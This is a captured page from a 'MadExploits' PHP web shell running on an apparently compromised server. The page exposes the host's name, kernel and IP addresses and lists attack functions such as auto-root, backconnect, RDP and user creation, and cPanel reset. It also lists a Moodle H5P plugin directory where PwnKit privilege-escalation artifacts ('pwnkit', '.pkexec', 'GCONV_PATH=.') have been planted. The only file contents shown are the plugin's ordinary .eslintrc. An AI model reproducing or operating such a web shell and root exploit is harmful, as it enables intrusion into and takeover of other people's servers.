Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.91
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
editor
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
library
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
reporting
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.eslintrc
5.77
KB
-rw-r--r--
.gitignore
49
B
-rw-r--r--
.gitmodules
323
B
-rw-r--r--
.jshintrc
163
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.travis.yml
4.8
KB
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
README.md
2.39
KB
-rw-r--r--
ajax.php
16.43
KB
-rw-r--r--
autoloader.php
3.68
KB
-rw-r--r--
content_hub_registration.php
2.03
KB
-rw-r--r--
dataviews.js
1.31
KB
-rw-r--r--
editor.js
1.25
KB
-rw-r--r--
embed.php
3.53
KB
-rw-r--r--
grade.php
5
KB
-rw-r--r--
index.php
4.25
KB
-rw-r--r--
lib.php
16.49
KB
-rw-r--r--
library_list.php
5.1
KB
-rw-r--r--
locallib.php
25.48
KB
-rw-r--r--
mod_form.php
18.76
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
3.1
KB
-rw-r--r--
review.php
6.74
KB
-rw-r--r--
settings-hide-key.js
1018
B
-rw-r--r--
settings.php
7.2
KB
-rw-r--r--
share.php
5.63
KB
-rw-r--r--
styles.css
2.18
KB
-rw-r--r--
thirdpartylibs.xml
542
B
-rw-r--r--
upgrade_content_page.php
4.95
KB
-rw-r--r--
version.php
1.06
KB
-rw-r--r--
view.css
1.74
KB
-rw-r--r--
view.php
3.37
KB
-rw-r--r--
xapi-collector.js
5.67
KB
-rw-r--r--
xapi-custom-report.css
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc
{ "env": { "browser": true, "amd": true }, "globals": { "M": true, "Y": true, "H5PIntegration": true, "H5PEditor": true, "H5P": true }, "rules": { "comma-dangle": "off", "no-compare-neg-zero": "error", "no-cond-assign": "error", "no-console": ["error", {"allow": ["warn", "error"]}], "no-constant-condition": "error", "no-control-regex": "error", "no-debugger": "error", "no-dupe-args": "error", "no-dupe-keys": "error", "no-duplicate-case": "error", "no-empty": "warn", "no-empty-character-class": "error", "no-ex-assign": "error", "no-extra-boolean-cast": "error", "no-extra-parens": "off", "no-extra-semi": "error", "no-func-assign": "error", "no-inner-declarations": "error", "no-invalid-regexp": "error", "no-irregular-whitespace": "error", "no-obj-calls": "error", "no-prototype-builtins": "off", "no-regex-spaces": "error", "no-sparse-arrays": "error", "no-unexpected-multiline": "error", "no-unreachable": "warn", "no-unsafe-finally": "error", "no-unsafe-negation": "error", "use-isnan": "error", "valid-jsdoc": ["warn", { "requireReturn": false, "requireParamDescription": false, "requireReturnDescription": false }], "valid-typeof": "error", "array-callback-return": "warn", "block-scoped-var": "warn", "complexity": "warn", "consistent-return": "warn", "curly": "error", "dot-notation": "warn", "no-alert": "warn", "no-caller": "error", "no-case-declarations": "error", "no-div-regex": "error", "no-empty-pattern": "error", "no-empty-function": "warn", "no-eq-null": "error", "no-eval": "error", "no-extend-native": "error", "no-extra-bind": "warn", "no-fallthrough": "error", "no-floating-decimal": "warn", "no-global-assign": "warn", "no-implied-eval": "error", "no-invalid-this": "error", "no-iterator": "error", "no-labels": "error", "no-loop-func": "error", "no-multi-spaces": "warn", "no-multi-str": "error", "no-new-func": "error", "no-new-wrappers": "error", "no-octal": "error", "no-octal-escape": "error", "no-proto": "error", "no-redeclare": "warn", "no-return-assign": "error", "no-script-url": "error", "no-self-assign": "error", "no-self-compare": "error", "no-sequences": "warn", "no-throw-literal": "warn", "no-unmodified-loop-condition": "error", "no-unused-expressions": "error", "no-unused-labels": "error", "no-useless-call": "warn", "no-useless-escape": "warn", "no-with": "error", "wrap-iife": ["error", "any"], "no-delete-var": "error", "no-undef": "error", "no-undef-init": "error", "no-unused-vars": ["error", { "caughtErrors": "none" }], "array-bracket-spacing": "warn", "block-spacing": "warn", "brace-style": ["warn", "1tbs"], "camelcase": "warn", "capitalized-comments": ["warn", "always", { "ignoreConsecutiveComments": true }], "comma-spacing": ["warn", { "before": false, "after": true }], "comma-style": ["warn", "last"], "computed-property-spacing": "error", "consistent-this": "off", "eol-last": "off", "func-call-spacing": ["warn", "never"], "func-names": "off", "func-style": "off", "indent": ["off", 4, { "SwitchCase": 1 }], "key-spacing": ["warn", { "beforeColon": false, "afterColon": true, "mode": minimum }], "keyword-spacing": "warn", "linebreak-style": ["error", "unix"], "lines-around-comment": "off", "max-len": ["error", 132], "max-lines": "off", "max-depth": "warn", "max-nested-callbacks": ["warn", 5], "max-params": "off", "max-statements": "off", "max-statements-per-line": ["warn", { max: 2 }], "new-cap": ["warn", { "properties": false }], "new-parens": "warn", "newline-after-var": "off", "newline-before-return": "off", "newline-per-chained-call": "off", "no-array-constructor": "off", "no-bitwise": "error", "no-continue": "off", "no-inline-comments": "off", "no-lonely-if": "off", "no-mixed-operators": "off", "no-mixed-spaces-and-tabs": "error", "no-multiple-empty-lines": "warn", "no-negated-condition": "off", "no-nested-ternary": "warn", "no-new-object": "off", "no-plusplus": "off", "no-tabs": "error", "no-ternary": "off", "no-trailing-spaces": "error", "no-underscore-dangle": "off", "no-unneeded-ternary": "off", "no-whitespace-before-property": "warn", "object-curly-newline": "off", "object-curly-spacing": "warn", "object-property-newline": "off", "one-var": "off", "one-var-declaration-per-line": ["warn", "initializations"], "operator-assignment": "off", "operator-linebreak": "off", "padded-blocks": "off", "quote-props": ["warn", "as-needed", {"unnecessary": false, "keywords": true, "numbers": true}], "quotes": "off", "require-jsdoc": "warn", "semi": "error", "semi-spacing": ["warn", {"before": false, "after": true}], "sort-vars": "off", "space-before-blocks": "warn", "space-before-function-paren": ["warn", "never"], "space-in-parens": "warn", "space-infix-ops": "warn", "space-unary-ops": "warn", "spaced-comment": "warn", "unicode-bom": "error", "wrap-regex": "off", "no-restricted-properties": ["warn", { "object": "M", "property": "str", "message": "Use AMD module 'core/str' or M.util.get_string()" }], }, overrides: [ { files: ["**/yui/src/**/*.js"], rules: { "no-undef": "off", "no-unused-vars": "off", "no-unused-expressions": "off" } }, { files: ["**/amd/src/*.js"], rules: { "no-unused-vars": "error", "no-implicit-globals": "error" } } ] }
Close